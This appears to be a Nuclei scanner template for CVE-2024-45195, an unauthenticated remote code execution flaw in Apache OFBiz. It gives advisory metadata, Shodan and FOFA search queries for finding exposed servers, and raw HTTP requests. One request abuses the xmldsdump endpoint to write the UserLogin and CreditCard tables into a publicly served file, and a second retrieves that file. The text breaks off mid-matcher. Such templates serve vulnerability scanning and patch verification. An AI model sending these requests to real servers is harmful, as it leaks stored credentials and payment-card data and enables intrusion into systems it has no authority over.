id: CVE-2024-45195 info: name: Apache OFBiz - Remote Code Execution author: DhiyaneshDK severity: high description: | Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server impact: | Unauthenticated attackers can exploit missing view authorization checks to execute arbitrary code on Apache OFBiz servers. remediation: | Users are recommended to upgrade to version 18.12.16, which fixes the issue. reference: - https://www.rapid7.com/blog/post/2024/09/05/cve-2024-45195-apache-ofbiz-unauthenticated-remote-code-execution-fixed/ - https://ofbiz.apache.org/download.html - https://nvd.nist.gov/vuln/detail/CVE-2024-45195 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-45195 cwe-id: CWE-425 epss-score: 0.94148 epss-percentile: 0.99919 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: vendor: apache product: ofbiz shodan-query: - ofbiz.visitor= - http.html:"ofbiz" fofa-query: - app="apache_ofbiz" - body="ofbiz" tags: cve,cve2024,apache,ofbiz,rce,instrusive,kev,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" http: - raw: - | POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded outpath=./themes/common-theme/webapp/common-theme/&maxrecords=&filename={{filename}}.txt&entityFrom_i18n=&entityFrom=&entityThru_i18n=&entityThru=&entitySyncId=&preConfiguredSetName=&entityName=UserLogin&entityName=CreditCard - | GET /common/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_2 words: - "